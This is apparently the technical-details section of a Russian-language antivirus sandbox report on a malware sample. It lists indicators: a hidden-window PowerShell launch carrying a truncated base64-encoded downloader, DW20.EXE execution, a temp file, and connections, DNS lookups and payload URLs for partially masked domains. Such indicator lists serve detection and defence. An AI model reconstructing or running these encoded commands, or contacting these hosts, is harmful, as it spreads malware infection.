Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABBAHEANQA1AGwAYwBoAD0AJwBPADMAbwBsAGcAYQBtACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBgAEMAVQByAEkAYABUAFkAcABgAFIATwB0AG8AQwBvAGwAIgAgAD0AIAAnAH...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1500
- %TEMP%\690600.cvr
- 'ca##ned.com':443
- 'se##ice.com':80
- 'cm###exham.com':80
- http://se##ice.com/bible/_session/rqc5g/
- http://cm###exham.com/video/Ji81477/
- 'ca##ned.com':443
- DNS ASK 20.##xtt.com
- DNS ASK me#####litanelites.com
- DNS ASK ca##ned.com
- DNS ASK se##ice.com
- DNS ASK cm###exham.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABBAHEANQA1AGwAYwBoAD0AJwBPADMAbwBsAGcAYQBtACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBgAEMAVQByAEkAYABUAFkAcABgAFIATwB0AG8AQwBvAGwAIgAgAD0AIAAnAH... (со скрытым окном)